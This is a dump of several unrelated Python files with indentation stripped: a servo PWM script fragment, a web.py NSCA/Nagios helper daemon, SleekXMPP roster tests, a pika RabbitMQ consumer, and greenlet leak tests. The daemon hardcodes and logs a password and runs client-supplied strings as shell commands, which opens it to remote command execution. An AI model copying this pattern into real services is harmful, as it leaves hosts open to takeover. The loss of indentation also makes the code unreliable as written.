duty = angle/36.0+ pwm_min
if duty > pwm_max:
duty = pwm_max
PWM.set_duty_cycle(SERVO_2, duty)
print "duty 2", duty
def servoLoop_1():
#Servo_1 = PWM.start(SERVO_1,start_duty,freq)
i = 0
while i < 51:
print "angle ",i
setServo_1(i)
sleep(1)
i += steps
while i > 0:
print "angle ",i
setServo_2(i)
sleep(1)
i -= steps
def servoLoop_2():
#Servo_2 = PWM.start(SERVO_2,start_duty,freq)
i = 0
while i < 50:
print "angle ",i
setServo_1(i)
sleep(1)
i += steps
while i > 0:
print "angle ",i
setServo_2(i)
sleep(1)
i -= steps
if __name__=="__main__":
# PWM.start(SERVO_1,start_duty,freq)
# PWM.start(SERVO_2,start_duty,freq)
#Servo_1 = PWM.start(SERVO_1,start_duty,freq)
#Servo_2 = PWM.start(SERVO_2,start_duty,freq)
#servoLoop_1()
#servoLoop_2()
# setServo_1(20)
# setServo_2(20)
'''
Does not work at the moment because loop is missing
'''
angle = 0
s1 = threading.Thread(target=setServo_1)
s1.setDaemon(True)
s2 = threading.Thread(target=setServo_2)
s2.setDaemon(True)
s1.start()
s2.start()
for j in range(20):
angle = j
print "angle loop: ",angle
sleep(1)
s1.join()
s2.join()
PWM.stop(SERVO_1)
PWM.stop(SERVO_2)
PWM.cleanup()
|
nsca-helper-daemon.py
|
import os
import sys
import web
import simplejson
import utils
from __exceptions__ import formattedException
'''
Requires: web.py --> http://webpy.org/
'''
import threading
__version__ = '1.0.0'
import logging
from logging import handlers
__PROGNAME__ = os.path.splitext(os.path.basename(sys.argv[0]))[0]
LOG_FILENAME = os.sep.join([os.path.dirname(sys.argv[0]),'%s.log' % (__PROGNAME__)])
class MyTimedRotatingFileHandler(handlers.TimedRotatingFileHandler):
def __init__(self, filename, maxBytes=0, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False):
handlers.TimedRotatingFileHandler.__init__(self, filename=filename, when=when, interval=interval, backupCount=backupCount, encoding=encoding, delay=delay, utc=utc)
self.maxBytes = maxBytes
def shouldRollover(self, record):
response = handlers.TimedRotatingFileHandler.shouldRollover(self, record)
if (response == 0):
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
try:
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
except:
pass
return 0
return response
logger = logging.getLogger(__PROGNAME__)
handler = logging.FileHandler(LOG_FILENAME)
#handler = handlers.TimedRotatingFileHandler(LOG_FILENAME, when='d', interval=1, backupCount=30, encoding=None, delay=False, utc=False)
#handler = MyTimedRotatingFileHandler(LOG_FILENAME, maxBytes=1000000, when='d', backupCount=30)
#handler = handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=1000000, backupCount=30, encoding=None, delay=False)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
print 'Logging to "%s".' % (handler.baseFilename)
ch = logging.StreamHandler()
ch_format = logging.Formatter('%(asctime)s - %(message)s')
ch.setFormatter(ch_format)
ch.setLevel(logging.DEBUG)
logger.addHandler(ch)
logging.getLogger().setLevel(logging.DEBUG)
urls = (
'/', 'Index',
'/nsca/(.+)', 'NSCAHelper',
'/nsca', 'NSCAHelper',
'/setwindowsagentaddr', 'Nothing',
'/setwindowsagentaddr/', 'Nothing',
)
### Templates
render = web.template.render('templates', base='base')
web.template.Template.globals.update(dict(
datestr = web.datestr,
render = render
))
def notfound():
return web.notfound("Sorry, the page you were looking for was not found. This message may be seen whenever someone tries to issue a negative number as part of the REST URL Signature and this is just not allowed at this time.")
__index__ = '''
<html>
<head>
<title>(c). Copyright 2013, AT&T, All Rights Reserved.</title>
<style>
#menu {
width: 200px;
float: left;
}
</style>
</head>
<body>
<ul id="menu">
<li><a href="/">Home</a></li>
</ul>
<p><b>UNAUTHORIZED ACCESS</b></p>
</body>
</html>
'''
class Index:
def GET(self):
""" Show page """
s = '%s %s' % (__PROGNAME__,__version__)
return __index__
class Nothing:
def POST(self):
web.header('Content-Type', 'text/html')
return __index__
__username__ = 'nscahelper'
__password__ = utils.md5('peekab00')
class NSCAHelper:
def GET(self):
web.header('Content-Type', 'text/html')
return __index__
def POST(self,uri):
'''
/nsca/nagios/update/config
{ "oper":"login",
"username":"nscahelper",
"password":"103136174d231aabe1de8feaf9afc92f",
"target":"nagios.cfg",
"cfg":"remote1_nagios2",
"service1": { "use":"generic-service",
"host_name":"remote1",
"service_description":"DISK_1",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service2": { "use":"generic-service",
"host_name":"remote1",
"service_description":"DISK_2",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
}
}
/nsca/nagios/send/nsca
{ "oper":"login",
"username":"nscahelper",
"password":"103136174d231aabe1de8feaf9afc92f",
"send_nsca": "localhost\\tDummy Service\\t2\\tlocalhost Mon Dec 23 22:03:50 UTC 2013",
"cfg":"/etc/send_nsca.cfg"
}
/nsca/nagios/create/config
{"oper": "login",
"username": "nscahelper",
"password": "103136174d231aabe1de8feaf9afc92f",
"target": "nagios.cfg",
"cfg": "remote2_nagios2",
"partitions": "awk '{print $4}' /proc/partitions | sed -e '/name/d' -e '/^$/d' -e '/[1-9]/!d'",
"host1": {
"use": "generic-host",
"host_name": "remote1",
"alias": "remote1",
"address": "0.0.0.0"
},
"command1": {
"command_name": "dummy_command2",
"command_line": "echo \"0\""
},
"service1": { "use":"generic-service",
"host_name":"remote1",
"service_description":"CPULoad",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service2": { "use":"generic-service",
"host_name":"remote1",
"service_description":"CurrentUsers",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service3": { "use":"generic-service",
"host_name":"remote1",
"service_description":"PING",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service4": { "use":"generic-service",
"host_name":"remote1",
"service_description":"SSH",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service5": { "use":"generic-service",
"host_name":"remote1",
"service_description":"TotalProcesses",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service6": { "use":"generic-service",
"host_name":"remote1",
"service_description":"ZombieProcesses",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
}
}
'''
logger.info('1. uri=%s' % (uri))
web.header('Content-Type', 'application/json')
logger.info('2. web.data()=%s' % (web.data()))
d = {}
status = ''
try:
payload = utils.SmartObject(simplejson.loads(web.data()))
except Exception, ex:
payload = utils.SmartObject()
content = formattedException(details=ex)
logger.exception(content)
d['exception1'] = content
try:
nagios_update_config = 'nagios/update/config'
nagios_create_config = 'nagios/create/config'
if (uri in [nagios_update_config,nagios_create_config]):
logger.info('3. payload.oper=%s' % (payload.oper))
if (payload.oper == 'login'):
logger.info('4. payload.username=%s' % (payload.username))
logger.info('5. payload.password=%s' % (payload.password))
if ( (payload.username == __username__) and (payload.password == __password__) ):
logger.info('6. payload.cfg=%s [%s]' % (payload.cfg,(payload.cfg is not None)))
if (payload.cfg is not None):
logger.info('7. utils.isUsingLinux=%s' % (utils.isUsingLinux))
nagios_cfg = str(payload.target) if (payload.target) else 'nagios.cfg'
if (utils.isUsingLinux):
if (nagios_cfg):
if (payload.cfg):
__cfg__ = None
__nagios_cfg__ = None
for top,dirs,files in utils.walk('/usr'):
#if (top.find('/usr/lib') > -1):
#logger.info('8. top=%s' % (top))
if (nagios_cfg in files):
#logger.debug('9. top=%s' % (top))
__nagios_cfg__ = os.sep.join([top,nagios_cfg])
logger.debug('10. __nagios_cfg__=%s [%s]' % (__nagios_cfg__,os.path.exists(__nagios_cfg__)))
for top,dirs,files in utils.walk('/etc'):
#logger.info('11. top=%s' % (top))
if (top.find('nagios') > -1):
#logger.debug('12. top=%s' % (top))
if (nagios_cfg in files):
logger.debug('13. top=%s' % (top))
__nagios_cfg__ = os.sep.join([top,nagios_cfg])
logger.debug('14. __nagios_cfg__=%s [%s]' % (__nagios_cfg__,os.path.exists(__nagios_cfg__)))
if (__nagios_cfg__) and (os.path.exists(__nagios_cfg__)):
logger.debug('20. __nagios_cfg__=%s [%s]' % (__nagios_cfg__,os.path.exists(__nagios_cfg__)))
for top,dirs,files in utils.walk(os.path.dirname(__nagios_cfg__)):
logger.debug('21. top=%s' % (top))
target_cfg = payload.cfg+'.cfg'
for f in files:
#logger.debug('22 f (%s) == target (%s) [%s]' % (f,target_cfg,(f == target_cfg)))
if (f == target_cfg):
__cfg__ = os.sep.join([top,f])
break
logger.debug('23. __cfg__=%s' % (__cfg__))
if (uri in [nagios_create_config]) and (__cfg__ is None):
__cfgd__ = os.sep.join([os.path.dirname(__nagios_cfg__),'conf.d'])
if (os.path.exists(__cfgd__)):
__cfg__ = __cfgd__
__cfg__ = os.sep.join([__cfg__,target_cfg])
logger.debug('24. __cfg__=%s' % (__cfg__))
logger.debug('25. __cfg__=%s [%s]' % (__cfg__,os.path.exists(__cfg__) if (__cfg__) else None))
if (payload.partitions):
logger.info('26. payload.partitions=%s' % (payload.partitions))
results = utils.shellexecute(payload.partitions)
logger.info('26.1 results=%s' % (results))
payload.partition_names = [str(r).strip() for r in results] if (utils.isList(results)) else results
logger.info('26.2 payload.partition_names=%s' % (payload.partition_names))
if (__cfg__) and (os.path.exists(__cfg__)) and (uri in [nagios_update_config]):
logger.debug('27. handle_disk_services !!!')
status = utils.handle_disk_services(__cfg__, payload,logger)
d['status'] = status
logger.debug('28. status=%s' % (status))
elif (__cfg__) and (uri in [nagios_create_config]):
logger.debug('29. handle_services !!!')
status = utils.handle_services(__cfg__, payload,logger)
d['status'] = status
logger.debug('30. status=%s' % (status))
else:
logger.exception('WARNING: Cannot handle config file of "%s".' % (__cfg__))
break
else:
logger.exception('WARNING: Cannot determine location of "%s".' % (nagios_cfg))
else:
logger.exception('WARNING: Cannot use or determine the valud of cfg which is "%s".' % (payload.cfg))
else:
logger.exception('WARNING: Cannot use nagios.cfg reference of "%s".' % (nagios_cfg))
else:
logger.exception('WARNING: Cannot run this program in any OS other than Linux, sorry.')
elif (uri == 'nagios/send/nsca'):
logger.info('3. payload.oper=%s' % (payload.oper))
if (payload.oper == 'login'):
logger.info('4. payload.username=%s' % (payload.username))
logger.info('5. payload.password=%s' % (payload.password))
if ( (payload.username == __username__) and (payload.password == __password__) ):
logger.info('6. payload.cfg=%s [%s]' % (payload.cfg,(payload.cfg is not None)))
if (payload.cfg is not None):
logger.info('7. utils.isUsingLinux=%s' % (utils.isUsingLinux))
send_nsca_cfg = str(payload.cfg)
if (utils.isUsingLinux):
if (send_nsca_cfg) and (os.path.exists(send_nsca_cfg)):
logger.info('8. send_nsca_cfg=%s' % (send_nsca_cfg))
results = utils.shellexecute('which send_nsca')
logger.info('9. results=%s' % (results))
__send_nsca__ = results[0].split('\n')[0] if (utils.isList(results)) else results.split('\n')[0]
logger.info('10. __send_nsca__=%s' % (__send_nsca__))
if (__send_nsca__) and (os.path.exists(__send_nsca__)):
logger.info('11. payload.send_nsca=%s' % (payload.send_nsca))
__cmd__ = 'printf "%%s\\n" "%s" | %s -H 127.0.0.1 -p 5667 -c %s' % (payload.send_nsca.replace('\\t','\t'),__send_nsca__,send_nsca_cfg)
logger.info('12. __cmd__=%s' % (__cmd__))
results = utils.shellexecute(__cmd__)
if (utils.isList(results)):
', '.join(results)
logger.info('13. results=%s' % (results))
d['status'] = results
else:
logger.exception('WARNING: Cannot determine location of send_nsca command from "%s".' % (__send_nsca__))
else:
logger.exception('WARNING: Cannot determine location of "%s".' % (send_nsca_cfg))
except Exception, ex:
content = formattedException(details=ex)
logger.exception(content)
d['exception2'] = content
return simplejson.dumps(d)
app = web.application(urls, globals())
app.notfound = notfound
if __name__ == '__main__':
'''
python nsca-helper-daemon.py
'''
import re
__re__ = re.compile(r"(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):([0-9]{1,5})", re.MULTILINE)
has_binding = any([__re__.match(arg) for arg in sys.argv])
if (not has_binding):
sys.argv.append('0.0.0.0:15667')
def __init__():
logger.info('%s %s started !!!' % (__PROGNAME__,__version__))
app.run()
t = threading.Thread(target=__init__)
t.daemon = False
t.start()
|
test_stream_roster.py
|
# -*- encoding:utf-8 -*-
from __future__ import unicode_literals
import unittest
from sleekxmpp.exceptions import IqTimeout
from sleekxmpp.test import SleekTest
import time
import threading
class TestStreamRoster(SleekTest):
"""
Test handling roster updates.
"""
def tearDown(self):
self.stream_close()
def testGetRoster(self):
"""Test handling roster requests."""
self.stream_start(mode='client', jid='tester@localhost')
roster_updates = []
self.xmpp.add_event_handler('roster_update', roster_updates.append)
# Since get_roster blocks, we need to run it in a thread.
t = threading.Thread(name='get_roster', target=self.xmpp.get_roster)
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.recv("""
<iq to='tester@localhost' type="result" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="from"
ask="subscribe">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
# Wait for get_roster to return.
t.join()
# Give the event queue time to process.
time.sleep(.1)
self.check_roster('tester@localhost', 'user@localhost',
name='User',
subscription='from',
afrom=True,
pending_out=True,
groups=['Friends', 'Examples'])
self.failUnless(len(roster_updates) == 1,
"Wrong number of roster_update events fired: %s (should be 1)" % len(roster_updates))
def testRosterSet(self):
"""Test handling pushed roster updates."""
self.stream_start(mode='client')
events = []
def roster_update(e):
events.append('roster_update')
self.xmpp.add_event_handler('roster_update', roster_update)
self.recv("""
<iq to='tester@localhost' type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="both">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
self.send("""
<iq type="result" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.check_roster('tester@localhost', 'user@localhost',
name='User',
subscription='both',
groups=['Friends', 'Examples'])
# Give the event queue time to process.
time.sleep(.1)
self.failUnless('roster_update' in events,
"Roster updated event not triggered: %s" % events)
def testRosterPushRemove(self):
"""Test handling roster item removal updates."""
self.stream_start(mode='client')
events = []
# Add roster item
self.recv("""
<iq to='tester@localhost' type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="both">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
self.send("""
<iq type="result" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.assertTrue('user@localhost' in self.xmpp.client_roster)
# Receive item remove push
self.recv("""
<iq to='tester@localhost' type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
subscription="remove">
</item>
</query>
</iq>
""")
self.send("""
<iq type="result" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.assertTrue('user@localhost' not in self.xmpp.client_roster)
def testUnauthorizedRosterPush(self):
"""Test rejecting a roster push from an unauthorized source."""
self.stream_start()
self.recv("""
<iq to='tester@localhost' from="malicious_user@localhost"
type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="both">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
self.send("""
<iq to="malicious_user@localhost" type="error" id="1">
<error type="cancel" code="503">
<service-unavailable xmlns="urn:ietf:params:xml:ns:xmpp-stanzas" />
</error>
</iq>
""")
def testRosterTimeout(self):
"""Test handling a timed out roster request."""
self.stream_start()
def do_test():
self.xmpp.get_roster(timeout=0)
time.sleep(.1)
self.assertRaises(IqTimeout, do_test)
def testRosterCallback(self):
"""Test handling a roster request callback."""
self.stream_start()
events = []
def roster_callback(iq):
events.append('roster_callback')
# Since get_roster blocks, we need to run it in a thread.
t = threading.Thread(name='get_roster',
target=self.xmpp.get_roster,
kwargs={str('block'): False,
str('callback'): roster_callback})
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.recv("""
<iq type="result" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="both">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
# Wait for get_roster to return.
t.join()
# Give the event queue time to process.
time.sleep(.1)
self.failUnless(events == ['roster_callback'],
"Roster timeout event not triggered: %s." % events)
def testRosterUnicode(self):
"""Test that JIDs with Unicode values are handled properly."""
self.stream_start(plugins=[])
self.recv("""
<iq to="tester@localhost" type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="andré@foo" subscription="both">
<group>Unicode</group>
</item>
</query>
</iq>
""")
# Give the event queue time to process.
time.sleep(.1)
self.check_roster('tester@localhost', 'andré@foo',
subscription='both',
groups=['Unicode'])
jids = list(self.xmpp.client_roster.keys())
self.failUnless(jids == ['andré@foo'],
"Too many roster entries found: %s" % jids)
self.recv("""
<presence to="tester@localhost" from="andré@foo/bar">
<show>away</show>
<status>Testing</status>
</presence>
""")
# Give the event queue time to process.
time.sleep(.1)
result = self.xmpp.client_roster['andré@foo'].resources
expected = {'bar': {'status':'Testing',
'show':'away',
'priority':0}}
self.failUnless(result == expected,
"Unexpected roster values: %s" % result)
def testSendLastPresence(self):
"""Test that sending the last presence works."""
self.stream_start(plugins=[])
self.xmpp.send_presence(pshow='dnd')
self.xmpp.auto_authorize = True
self.xmpp.auto_subscribe = True
self.send("""
<presence>
<show>dnd</show>
</presence>
""")
self.recv("""
<presence from="user@localhost"
to="tester@localhost"
type="subscribe" />
""")
self.send("""
<presence to="user@localhost"
type="subscribed" />
""")
self.send("""
<presence to="user@localhost">
<show>dnd</show>
</presence>
""")
def testUnsupportedRosterVer(self):
"""Test working with a server without roster versioning."""
self.stream_start()
self.assertTrue('rosterver' not in self.xmpp.features)
t = threading.Thread(name='get_roster', target=self.xmpp.get_roster)
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.recv("""
<iq to="tester@localhost" type="result" id="1" />
""")
t.join()
def testBootstrapRosterVer(self):
"""Test bootstrapping with roster versioning."""
self.stream_start()
self.xmpp.features.add('rosterver')
self.xmpp.client_roster.version = ''
t = threading.Thread(name='get_roster', target=self.xmpp.get_roster)
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" ver="" />
</iq>
""")
self.recv("""
<iq to="tester@localhost" type="result" id="1" />
""")
t.join()
def testExistingRosterVer(self):
"""Test using a stored roster version."""
self.stream_start()
self.xmpp.features.add('rosterver')
self.xmpp.client_roster.version = '42'
t = threading.Thread(name='get_roster', target=self.xmpp.get_roster)
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" ver="42" />
</iq>
""")
self.recv("""
<iq to="tester@localhost" type="result" id="1" />
""")
t.join()
suite = unittest.TestLoader().loadTestsFromTestCase(TestStreamRoster)
|
pika_consumer.py
|
# -*- coding: utf-8 -*-
import logging
import pika
from flask import Flask
import time
import threading
import atexit
LOG_FORMAT = ('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) '
'-35s %(lineno) -5d: %(message)s')
LOGGER = logging.getLogger(__name__)
class ExampleConsumer(object):
"""This is an example consumer that will handle unexpected interactions
with RabbitMQ such as channel and connection closures.
If RabbitMQ closes the connection, it will reopen it. You should
look at the output, as there are limited reasons why the connection may
be closed, which usually are tied to permission related issues or
socket timeouts.
If the channel is closed, it will indicate a problem with one of the
commands that were issued and that should surface in the output as well.
"""
EXCHANGE = 'message'
EXCHANGE_TYPE = 'topic'
QUEUE = 'text'
ROUTING_KEY = 'example.text'
def __init__(self, amqp_url):
"""Create a new instance of the consumer class, passing in the AMQP
URL used to connect to RabbitMQ.
:param str amqp_url: The AMQP url to connect with
"""
self._connection = None
self._channel = None
self._closing = False
self._consumer_tag = None
self._url = amqp_url
def connect(self):
"""This method connects to RabbitMQ, returning the connection handle.
When the connection is established, the on_connection_open method
will be invoked by pika.
:rtype: pika.SelectConnection
"""
LOGGER.info('Connecting to %s', self._url)
return pika.SelectConnection(pika.URLParameters(self._url),
self.on_connection_open,
stop_ioloop_on_close=False)
def on_connection_open(self, unused_connection):
"""This method is called by pika once the connection to RabbitMQ has
been established. It passes the handle to the connection object in
case we need it, but in this case, we'll just mark it unused.
:type unused_connection: pika.SelectConnection
"""
LOGGER.info('Connection opened')
self.add_on_connection_close_callback()
self.open_channel()
def add_on_connection_close_callback(self):
"""This method adds an on close callback that will be invoked by pika
when RabbitMQ closes the connection to the publisher unexpectedly.
"""
LOGGER.info('Adding connection close callback')
self._connection.add_on_close_callback(self.on_connection_closed)
def on_connection_closed(self, connection, reply_code, reply_text):
"""This method is invoked by pika when the connection to RabbitMQ is
closed unexpectedly. Since it is unexpected, we will reconnect to
RabbitMQ if it disconnects.
:param pika.connection.Connection connection: The closed connection obj
:param int reply_code: The server provided reply_code if given
:param str reply_text: The server provided reply_text if given
"""
self._channel = None
if self._closing:
self._connection.ioloop.stop()
else:
LOGGER.warning('Connection closed, reopening in 5 seconds: (%s) %s',
reply_code, reply_text)
self._connection.add_timeout(5, self.reconnect)
def reconnect(self):
"""Will be invoked by the IOLoop timer if the connection is
closed. See the on_connection_closed method.
"""
# This is the old connection IOLoop instance, stop its ioloop
self._connection.ioloop.stop()
if not self._closing:
# Create a new connection
self._connection = self.connect()
# There is now a new connection, needs a new ioloop to run
self._connection.ioloop.start()
def open_channel(self):
"""Open a new channel with RabbitMQ by issuing the Channel.Open RPC
command. When RabbitMQ responds that the channel is open, the
on_channel_open callback will be invoked by pika.
"""
LOGGER.info('Creating a new channel')
self._connection.channel(on_open_callback=self.on_channel_open)
def on_channel_open(self, channel):
"""This method is invoked by pika when the channel has been opened.
The channel object is passed in so we can make use of it.
Since the channel is now open, we'll declare the exchange to use.
:param pika.channel.Channel channel: The channel object
"""
LOGGER.info('Channel opened')
self._channel = channel
self.add_on_channel_close_callback()
self.setup_exchange(self.EXCHANGE)
def add_on_channel_close_callback(self):
"""This method tells pika to call the on_channel_closed method if
RabbitMQ unexpectedly closes the channel.
"""
LOGGER.info('Adding channel close callback')
self._channel.add_on_close_callback(self.on_channel_closed)
def on_channel_closed(self, channel, reply_code, reply_text):
"""Invoked by pika when RabbitMQ unexpectedly closes the channel.
Channels are usually closed if you attempt to do something that
violates the protocol, such as re-declare an exchange or queue with
different parameters. In this case, we'll close the connection
to shutdown the object.
:param pika.channel.Channel: The closed channel
:param int reply_code: The numeric reason the channel was closed
:param str reply_text: The text reason the channel was closed
"""
LOGGER.warning('Channel %i was closed: (%s) %s',
channel, reply_code, reply_text)
self._connection.close()
def setup_exchange(self, exchange_name):
"""Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC
command. When it is complete, the on_exchange_declareok method will
be invoked by pika.
:param str|unicode exchange_name: The name of the exchange to declare
"""
LOGGER.info('Declaring exchange %s', exchange_name)
self._channel.exchange_declare(self.on_exchange_declareok,
exchange_name,
self.EXCHANGE_TYPE)
def on_exchange_declareok(self, unused_frame):
"""Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC
command.
:param pika.Frame.Method unused_frame: Exchange.DeclareOk response frame
"""
LOGGER.info('Exchange declared')
self.setup_queue(self.QUEUE)
def setup_queue(self, queue_name):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
:param str|unicode queue_name: The name of the queue to declare.
"""
LOGGER.info('Declaring queue %s', queue_name)
self._channel.queue_declare(self.on_queue_declareok, queue_name)
def on_queue_declareok(self, method_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange together with the routing key by issuing the Queue.Bind
RPC command. When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
LOGGER.info('Binding %s to %s with %s',
self.EXCHANGE, self.QUEUE, self.ROUTING_KEY)
self._channel.queue_bind(self.on_bindok, self.QUEUE,
self.EXCHANGE, self.ROUTING_KEY)
def on_bindok(self, unused_frame):
"""Invoked by pika when the Queue.Bind method has completed. At this
point we will start consuming messages by calling start_consuming
which will invoke the needed RPC commands to start the process.
:param pika.frame.Method unused_frame: The Queue.BindOk response frame
"""
LOGGER.info('Queue bound')
self.start_consuming()
def start_consuming(self):
"""This method sets up the consumer by first calling
add_on_cancel_callback so that the object is notified if RabbitMQ
cancels the consumer. It then issues the Basic.Consume RPC command
which returns the consumer tag that is used to uniquely identify the
consumer with RabbitMQ. We keep the value to use it when we want to
cancel consuming. The on_message method is passed in as a callback pika
will invoke when a message is fully received.
"""
LOGGER.info('Issuing consumer related RPC commands')
self.add_on_cancel_callback()
self._consumer_tag = self._channel.basic_consume(self.on_message,
self.QUEUE)
def add_on_cancel_callback(self):
"""Add a callback that will be invoked if RabbitMQ cancels the consumer
for some reason. If RabbitMQ does cancel the consumer,
on_consumer_cancelled will be invoked by pika.
"""
LOGGER.info('Adding consumer cancellation callback')
self._channel.add_on_cancel_callback(self.on_consumer_cancelled)
def on_consumer_cancelled(self, method_frame):
"""Invoked by pika when RabbitMQ sends a Basic.Cancel for a consumer
receiving messages.
:param pika.frame.Method method_frame: The Basic.Cancel frame
"""
LOGGER.info('Consumer was cancelled remotely, shutting down: %r',
method_frame)
if self._channel:
self._channel.close()
def on_message(self, unused_channel, basic_deliver, properties, body):
"""Invoked by pika when a message is delivered from RabbitMQ. The
channel is passed for your convenience. The basic_deliver object that
is passed in carries the exchange, routing key, delivery tag and
a redelivered flag for the message. The properties passed in is an
instance of BasicProperties with the message properties and the body
is the message that was sent.
:param pika.channel.Channel unused_channel: The channel object
:param pika.Spec.Basic.Deliver: basic_deliver method
:param pika.Spec.BasicProperties: properties
:param str|unicode body: The message body
"""
LOGGER.info('Received message # %s from %s: %s',
basic_deliver.delivery_tag, properties.app_id, body)
#######
# I WAIT
#######
LOGGER.info("After consuming this message, I feel a bit lazy...sleeping for 1 second ヾ( ̄0 ̄ )ノ")
time.sleep(1)
self.acknowledge_message(basic_deliver.delivery_tag)
def acknowledge_message(self, delivery_tag):
"""Acknowledge the message delivery from RabbitMQ by sending a
Basic.Ack RPC method for the delivery tag.
:param int delivery_tag: The delivery tag from the Basic.Deliver frame
"""
LOGGER.info('Acknowledging message %s', delivery_tag)
self._channel.basic_ack(delivery_tag)
def stop_consuming(self):
"""Tell RabbitMQ that you would like to stop consuming by sending the
Basic.Cancel RPC command.
"""
if self._channel:
LOGGER.info('Sending a Basic.Cancel RPC command to RabbitMQ')
self._channel.basic_cancel(self.on_cancelok, self._consumer_tag)
def on_cancelok(self, unused_frame):
"""This method is invoked by pika when RabbitMQ acknowledges the
cancellation of a consumer. At this point we will close the channel.
This will invoke the on_channel_closed method once the channel has been
closed, which will in-turn close the connection.
:param pika.frame.Method unused_frame: The Basic.CancelOk frame
"""
LOGGER.info('RabbitMQ acknowledged the cancellation of the consumer')
self.close_channel()
def close_channel(self):
"""Call to close the channel with RabbitMQ cleanly by issuing the
Channel.Close RPC command.
"""
LOGGER.info('Closing the channel')
self._channel.close()
def run(self):
"""Run the example consumer by connecting to RabbitMQ and then
starting the IOLoop to block and allow the SelectConnection to operate.
"""
self._connection = self.connect()
thread = threading.Thread(target=self._connection.ioloop.start)
thread.setDaemon(True)
thread.start()
def stop(self):
"""Cleanly shutdown the connection to RabbitMQ by stopping the consumer
with RabbitMQ. When RabbitMQ confirms the cancellation, on_cancelok
will be invoked by pika, which will then closing the channel and
connection. The IOLoop is started again because this method is invoked
when CTRL-C is pressed raising a KeyboardInterrupt exception. This
exception stops the IOLoop which needs to be running for pika to
communicate with RabbitMQ. All of the commands issued prior to starting
the IOLoop will be buffered but not processed.
"""
LOGGER.info('Stopping')
self._closing = True
self.stop_consuming()
self._connection.ioloop.start()
LOGGER.info('Stopped')
def close_connection(self):
"""This method closes the connection to RabbitMQ."""
LOGGER.info('Closing connection')
self._connection.close()
def create_app():
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
# init app and config
application = Flask(__name__)
pika_consumer_qty = 20
LOGGER.info('Starting Example Consumers...')
pika_consumers = []
for i in range(0, pika_consumer_qty):
LOGGER.info('...' + str(i))
example_consumer = ExampleConsumer('amqp://guest:guest@localhost:5672/%2F')
example_consumer.run()
pika_consumers.append(example_consumer)
LOGGER.info('Done.')
# register hook to stop consumers on exit
def shutdown_consumers():
for consumer in pika_consumers:
LOGGER.info("Goodbye!")
consumer.stop()
atexit.register(shutdown_consumers)
return application
if __name__ == '__main__':
app = create_app()
app.run(debug=True, host='0.0.0.0')
|
test_leaks.py
|
import unittest
import sys
import gc
import weakref
import greenlet
import threading
class ArgRefcountTests(unittest.TestCase):
def test_arg_refs(self):
args = ('a', 'b', 'c')
refcount_before = sys.getrefcount(args)
g = greenlet.greenlet(
lambda *args: greenlet.getcurrent().parent.switch(*args))
for i in range(100):
g.switch(*args)
self.assertEqual(sys.getrefcount(args), refcount_before)
def test_kwarg_refs(self):
kwargs = {}
g = greenlet.greenlet(
lambda **kwargs: greenlet.getcurrent().parent.switch(**kwargs))
for i in range(100):
g.switch(**kwargs)
self.assertEqual(sys.getrefcount(kwargs), 2)
if greenlet.GREENLET_USE_GC:
# These only work with greenlet gc support
def test_threaded_leak(self):
gg = []
def worker():
# only main greenlet present
gg.append(weakref.ref(greenlet.getcurrent()))
for i in range(2):
t = threading.Thread(target=worker)
t.start()
t.join()
del t
